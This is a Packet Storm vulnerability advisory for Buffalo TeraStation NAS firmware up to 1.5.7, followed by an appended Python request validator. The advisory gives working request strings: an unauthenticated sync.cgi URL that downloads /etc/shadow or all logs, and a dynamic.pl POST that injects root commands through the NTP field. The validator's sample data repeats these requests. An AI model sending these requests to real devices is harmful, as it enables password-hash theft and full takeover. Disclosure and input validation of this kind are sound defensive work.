Buffalo TeraStation TS-Series Command Execution

Published: 30 Jan 2013 00:00:00. Reported by: Andrea Fabrizi. Type: packetstorm. Source: packetstormsecurity.com

Buffalo TeraStation TS-Series multiple vulnerabilities, firmware version <= 1.5.7, unpatched.

Code

```text
**************************************************************
Title: Buffalo TeraStation TS-Series multiple vulnerabilities
Version affected: firmware version <= 1.5.7
Vendor: http://www.buffalotech.com/products/network-storage
Discovered by: Andrea Fabrizi
Email: [email protected]
Web: http://www.andreafabrizi.it
Twitter: @andreaf83
Status: unpatched
**************************************************************

Buffalo's TeraStation network attached storage (NAS) solutions offer
centralized storage and backup for home, small office and business
needs.

The firmware is based on Linux ARM and most of the internal software
is written in Perl.

The vulnerabilities that I found allow any unauthenticated attacker
to access arbitrary files on the NAS filesystem and execute system
commands with root privileges.

Tested successfully on TS-XL, TS-RXL, TS-WXL, TS-HTGL/R5, TS-XEL with
the latest firmware installed (v1.57). Other versions with the same
firmware are surely vulnerable as well.

1]======== sync.cgi unauthenticated arbitrary file download ========
By requesting an unprotected CGI, an unauthenticated user can download
any system file, including /etc/shadow, which contains the password
hashes for the application/system users.

/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=/etc/shadow

Moreover, using the key "all", it's possible to download the entire
/var/log directory:

/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=all

2]======== dynamic.pl NTP command injection ========
This vulnerability allows authenticated users to execute arbitrary
commands on the system with root privileges.

This is a sample request:
#####################################
POST /dynamic.pl HTTP/1.1
Content-Length: 89
Cookie: webui_session_admin=xxxxxxxxxxxxxxxxxxxxxx_en_0

bufaction=setDTSettings&dateMethod=on
&ip=www.google.it%26%26[COMMAND]>/tmp/output
&syncFreq=1d
#####################################

The command output can then be read through the previous
vulnerability (downloading the /tmp/output file).
```
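As an added defensive example (not part of the advisory and not Buffalo's firmware code), the following Python models the input validation a patched CGI or a front-end request filter would apply to both issues above: sync.cgi's gKey is restricted to an allowlist of named logs (so neither a path nor "all" is accepted), and dynamic.pl's NTP server parameter is accepted only when it parses as a hostname or IPv4 literal, so it can never carry shell syntax. The allowlisted key names and the sample requests are constructed placeholders; the real key set is not known from the advisory.

```python
"""Defensive checks for the two TeraStation issues in the advisory above.

Constructed example: the allowlisted log names are placeholders, not
Buffalo's real values, and the sample requests are synthetic.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Placeholder allowlist of downloadable logs (assumed names; the real
# key set would come from the firmware).
ALLOWED_LOG_KEYS = {"system", "kernel", "smb"}

# RFC 1123 label: alphanumerics and hyphens, no leading/trailing hyphen.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")
_OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4_RE = re.compile(rf"{_OCTET}(?:\.{_OCTET}){{3}}")


def valid_ntp_server(value: str) -> bool:
    """Positive validation: accept only a hostname or an IPv4 address.

    fullmatch rejects '&&', '>', whitespace and trailing newlines outright,
    which is safer than trying to enumerate shell metacharacters to strip.
    """
    if not value or len(value) > 253:
        return False
    return bool(IPV4_RE.fullmatch(value) or HOSTNAME_RE.fullmatch(value))


def valid_log_key(value: str) -> bool:
    """Only named logs may be exported; 'all' and any path are refused."""
    return value in ALLOWED_LOG_KEYS


def inspect_request(method: str, target: str, body: str = "") -> list:
    """Return a list of findings for one HTTP request ([] when clean)."""
    findings = []
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if parts.path == "/cgi-bin/sync.cgi":
        for key in query.get("gKey", []):
            if not valid_log_key(key):
                findings.append(f"sync.cgi: gKey {key!r} is not an allowlisted log")
    if method == "POST" and parts.path == "/dynamic.pl":
        form = parse_qs(body, keep_blank_values=True)
        if form.get("bufaction") == ["setDTSettings"]:
            for server in form.get("ip", []):
                if not valid_ntp_server(server):
                    findings.append(f"dynamic.pl: NTP server {server!r} is not a hostname or IP")
    return findings


# Constructed sample traffic (not captured from a real device). Requests
# 1, 2 and 4 mirror the advisory's examples; 0 and 3 are benign.
SAMPLE_REQUESTS = [
    ("GET", "/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=system", ""),
    ("GET", "/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=/etc/shadow", ""),
    ("GET", "/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=all", ""),
    ("POST", "/dynamic.pl", "bufaction=setDTSettings&dateMethod=on&ip=pool.ntp.org&syncFreq=1d"),
    ("POST", "/dynamic.pl", "bufaction=setDTSettings&dateMethod=on&ip=www.google.it%26%26[COMMAND]>/tmp/output&syncFreq=1d"),
]


def scan(requests=SAMPLE_REQUESTS) -> dict:
    """Map request index -> findings, omitting clean requests."""
    report = {}
    for idx, (method, target, body) in enumerate(requests):
        findings = inspect_request(method, target, body)
        if findings:
            report[idx] = findings
    return report


if __name__ == "__main__":
    for idx, findings in scan().items():
        print(idx, findings)
```

Positive validation (accepting only the grammar you expect) is the design point: a blocklist of shell metacharacters is easy to get wrong, whereas a hostname grammar leaves no room for `&&`, redirection or newlines. The sync.cgi check likewise closes both the path-style key and the `all` key, and the two attack requests from the advisory are flagged while the benign ones pass.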
